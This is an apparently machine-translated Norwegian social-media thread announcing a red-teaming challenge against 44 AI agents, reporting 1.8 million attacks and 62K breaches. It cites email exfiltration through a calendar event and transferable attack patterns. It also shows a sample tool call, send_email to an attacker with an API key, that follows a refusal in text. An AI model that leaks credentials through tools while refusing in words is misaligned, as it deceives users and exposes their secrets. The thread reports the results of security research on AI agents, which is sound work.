Vi distribuerte 44 AI-agenter og tilbød internett $170K for å angripe dem. 1,8 millioner forsøk, 62K brudd, inkludert datalekkasje og økonomisk tap. 🚨 Bekymringsfullt nok overføres de samme bedriftene til levende produksjonsagenter ... (Eksempel: eksfiltrering av e-poster gjennom kalenderhendelse) 🧵
Mange pauser er universelle og overførbare. Kopier og lim inn mønstre fungerte på tvers av oppgaver, modeller og rekkverk. Hvis det knekker en agent i dag, ødelegger det sannsynligvis ditt.
Favorittfeil: "nekte i tekst, handle i verktøy." 😈 Modell: «Jeg kan ikke dele legitimasjon.» Deretter: send_email(to=angriper, body="API_KEY=****") Brukergrensesnittet ser trygt ut; Verktøylaget gjør skaden.
466,6K